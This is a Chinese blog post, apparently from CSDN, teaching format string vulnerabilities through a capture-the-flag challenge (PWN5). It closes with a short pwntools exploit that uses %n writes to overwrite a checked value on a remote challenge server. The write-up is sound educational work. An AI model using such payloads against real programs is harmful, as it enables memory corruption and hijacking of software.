pwn-格式化字符串漏洞

最新推荐文章于 2024-10-06 21:08:53 发布
最新推荐文章于 2024-10-06 21:08:53 发布
阅读量937 收藏 3
点赞数
分类专栏: # PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43876357/article/details/108449135
版权
本文深入探讨了格式化字符串漏洞的原理,通过分析PWN5题目的实例,讲解了如何利用%d、%x和%n等格式控制符进行信息泄露及内存修改。通过构造payload,定位并修改特定内存地址,实现对程序行为的控制。
摘要由CSDN通过智能技术生成

一直想写一篇关于这个漏洞的博客,刚好借着今天刷到buu的【第五空间决赛2019】PWN5这道题来系统讲一下格式化字符串漏洞:
(这里这道题还是蛮简单的,主要是去理解这个漏洞的原理,关于该漏洞的难度稍大的题会零开博客讲解)

看一下几个经常用来测试格式化字符串的格式控制符
%d 用于读取10进制数值
%x 用于读取16进制数值 
(这两个都可以起到泄露信息的作用)
%s 用于读取字符串值  即泄露任意地址信息
(%d,%x只能泄露原有栈的内容,结合%s就可以泄露任意地址的内容)
(%s不直接打印栈中内容,而是通过栈中指针寻址,再打印)
%n用于把前面已经打印的长度写入某个内存地址
(把栈的地址当作指针,向它指向的地址写)

PWN5

我们输入一个比较长的字符可以发现它的输出回显稍微有点问题,所以大致推断溢出出在输出函数上。
然后向下找程序就会发现在第21行出现了我们讲到的——格式化字符串漏洞

首先我们先输入AAAA %08x %08x %8x %08x %08x %08x %08x %08X %08X %08X,发现输出的是

也就是说我们输入的AAAA——十六进制是41414141出现在了栈的第十个位置上

程序逻辑就是只要我们输入的等于系统产生的随机数,查看随机数的参数在函数里的地址,发现是4个字节:

那么我们可以分别用%(10~13)$去定位到这4个地址在% $后面+n,来修改这这个地址里的内容,exp如下:

from pwn import*

r=remote('node3.buuoj.cn',25544)

payload=p32(0x804c044)+p32(0x804c045)+p32(0x804c046)+p32(0x804c047)
payload+='%10$n%11$n%12$n%13$n'

r.sendline(payload)
# 0x10101010  4 * len(p32()) = 0x10
r.sendline(str(0x10101010))

r.interactive()

 

43v3rY0unG
关注
专栏目录
PWN-非栈上格式化字符串漏洞
10-06
PWN-非栈上格式化字符串漏洞
菜鸟PWN手进阶之格式化字符串
re1wn
01-05 6539
菜鸟PWN手进阶之格式化字符串
软件安全概述
AudreyQCb的博客
09-26 8999
一、软件安全 1、软件安全关注的是计算机程序或程序中信息的完整性、机密性和可用性 2、软件的安全缺陷: 1)软件自身的缺陷,设计者故意或过失 2)软件漏洞是基本的形态,而恶意代码是延伸的形体 3)软件中的客观存在 3、风险与安全事件 风险:软件内在的漏洞暴露在外在的威胁时称为风险 安全事件:软件内在的缺陷遭遇到威胁时为安全事件 4、软件安全范围 软件生命周期:软件设计阶段、软件编码测试阶段、软件运...
PWN--非栈上格式化字符串漏洞
最新发布
2302_79542511的博客
10-06 274
最近刷题碰到了非栈上的格式化字符串漏洞。这类题的特点是格式化字符串不在栈上,那么就不能用fmt_str工具来任意地址写了,而是必须要自己手搓。那么如何手搓呢?主要是利用%kc和%k$hn(双字节)或者%k$hhn(单字节)。%kc(k是一个整数)的作用是打印k个空字符,这样的话可以控制%k$n写入的值。%k$n的作用是对于第k个参数(必须是指针类型),往其指向的地址写入已打印的字符个数。具体如何操作,请看例题。
buuoj —— [第五空间2019 决赛]PWN5
qq_41027231的博客
05-30 217
格式化字符串: https://www.cnblogs.com/0xJDchen/p/5904816.html %d:读取10进制数值 %x:读取16进制数值 %s:读取字符串值 %n:将当前字符串的长度打印到var中。如 printf(“test %hn”,&var[其中var为两个字节]) printf(“test %n”,&var[其中var为一个字节]) 1)得到字符串离esp的距离 输入多个%08x; %12x可以直接读取偏移12处的值,省略输入前11个2)对任意地址进行任意写写任
格式化字符串漏洞详解
m0_57836225的博客
08-07 345
定义了 `targetAddress` 为一个假设的内存地址 `0x12345678` ,`writtenCount` 用于存储后面的写入数量。然后使用 `sprintf` 函数生成一个字符串 `maliciousInput2` ,格式为 `%999d%n`。由于 `%n` 的存在,可能会导致将输出的大量空格的数量写入到 `targetAddress` 所指向的内存地址,从而造成内存写入问题,可能破坏关键数据。这种直接使用未经验证的用户输入作为格式化字符串的做法是不安全的,可能导致各种漏洞
信息系统安全导论第六章之软件安全
JieBao11的博客
03-10 2618
武大信息系统安全导论(王鹃)学习记录
PWN-Challenges
03-17
3. **格式字符串漏洞**:利用printf或scanf等函数的格式化字符串特性,通过特殊格式字符读取或修改内存。 4. **栈保护机制**:理解并绕过如Canary、NX Bit(非执行栈)和ASLR(地址空间布局随机化)等安全防护机制...
ciscn-2019-pwn
11-29
- **daily** 文件可能是一个模拟日常应用的程序,可能存在常见的安全漏洞,如缓冲区溢出或格式字符串漏洞。 - **your_pwn** 文件可能是一个定制的环境,要求参赛者根据特定的情境来编写exploit。 - **baby_pwn** ...
02-linux pwn入门学习到放弃.pdf
09-20
当程序使用大量字符串操作和内存操作函数时,开启FORTIFY_SOURCE选项,GCC会在编译时检查潜在的溢出问题,但不会改变程序的功能。 栈溢出是缓冲区溢出的一种,攻击者通过覆盖栈上的返回地址来执行任意代码。文档中...
PWN测试题目
07-18
2. **格式字符串漏洞**:利用printf等函数的格式化字符串特性,可以修改内存中的内容。理解格式化字符串的工作原理和相关的安全限制是解决这类问题的关键。 3. **堆操作**:包括Fastbin Dup、Unsorted Bin Attack、...
软件安全期末总结
夏日 の blog
07-05 6401
软件自身安全(软件缺陷与漏洞)、恶意软件攻击与检测、软件逆向分析(软件破解)与防护按漏洞可能对系统造成的直接威胁划分获取访问权限漏洞、权限提升漏洞、拒绝服务攻击漏洞、恶意软件植入漏洞、数据丢失或泄露漏洞等按漏洞的成因划分输入验证错误、访问验证错误、竞争条件错误、意外情况处理错误、设计错误、配置错误、环境错误等按漏洞的严重等级划分可分为高、中、低三个级别远程和本地管理员对应为高,普通用户权限、权限提升、读取受限文件远程和本地拒绝服务对应为中,远程非授权文件存取、口令恢复、欺骗。
软件安全的基础知识:如何保护软件应用的安全
AI天才研究院
12-27 1726
1.背景介绍 软件安全是在现代信息化时代中非常重要的一方面是因为软件应用程序已经成为我们日常生活中的一部分,它们涉及到我们的财务、个人信息、健康等方方面面。另一方面,软件应用程序也成为了潜在的攻击目标,黑客和恶意软件开发者不断地寻找新的攻击方式和漏洞来破坏和窃取我们的数据和资源。因此,保护软件应用程序的安全已经成为了一项关键的挑战。 在本文中,我们将讨论软件安全的基础知识,包括其核心概念、核心...
pwn学习笔记(5)--格式化字符串漏洞(未完全完成)
qq_66013948的博客
03-05 1430
格式化字符串函数可以接收可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数格式化字符串函数格式化字符串[后续参数]
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 6312
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串
[PWN]——格式化字符串漏洞(包含几种解题方法)
ysy___ysy的博客
01-19 3354
如果要自己采用"%x$n"的方式手动构造payload容易出错,所以使用pwntools中的FmtStr格式化字符串类来解决格式化字符串漏洞比较方便做题。如果有什么错误的地方请师傅们告诉我一下。本文制作不易,盗版必究。
Pwn 学习 格式化字符串
MrTreebook的博客
08-19 1642
每一种 pattern 的含义请具体参考维基百科的格式化字符串。以下几个 pattern 中的对应选择需要重点关注。可以看到%10p的作用是直接打印第十个%p位置上的指针内容。通过格式化字符串可以无限泄露栈上的数据。
pwn格式化字符串的浅显理解
javagty6778的博客
03-19 254
这时候可以输入格式化字符 %d,%p等控制函数的输出。2.### 简单解释格式化字符串原理1.这是两段程序的源码:* 1️⃣。2.对应的汇编代码:* 1️⃣。
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式化字符串漏洞通常发生在使用格式化输出函数(如printf)时,输入的格式字符串中包含了未经验证的用户输入。攻击者可以通过修改格式字符串中的特殊格式标识符来读取或修改内存中的数据。 为了防止格式化字符串漏洞,开发者应该对用户输入进行严格的验证和过滤,确保输入的格式字符串没有恶意的内容。此外,可以使用安全的格式化输出函数(如snprintf)来替代不安全的输出函数,以提高代码的安全性。 如果你需要更详细的信息,请告诉我。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值